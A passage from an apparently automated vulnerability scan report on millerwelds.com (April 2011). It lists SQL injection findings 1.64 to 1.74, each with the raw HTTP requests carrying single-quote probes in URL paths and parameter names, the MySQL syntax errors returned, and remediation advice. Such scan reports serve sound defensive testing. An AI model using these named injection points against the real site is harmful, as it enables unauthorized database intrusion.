Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:23 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.64. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.65. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf'/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:17 GMT
Connection: Keep-Alive
Content-Length: 27701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.66. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf/001625sites_QMS.pdf' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/pdf/001625sites_QMS.pdf''' at line 1)<br>
...[SNIP]...
1.67. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:47 GMT
Connection: Keep-Alive
Content-Length: 27704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.68. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:50 GMT
Connection: Keep-Alive
Content-Length: 27982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.69. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:10 GMT
Connection: Keep-Alive
Content-Length: 17965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:11 GMT
Connection: Keep-Alive
Content-Length: 19672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...
1.70. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:56 GMT
Connection: Keep-Alive
Content-Length: 27718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.71. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:59 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.72. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories/international'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:01 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.73. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/international/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:18 GMT
Connection: Keep-Alive
Content-Length: 19560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/international/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 21253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...
1.74. http://www.millerwelds.com/resources/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /resources/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /resources'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
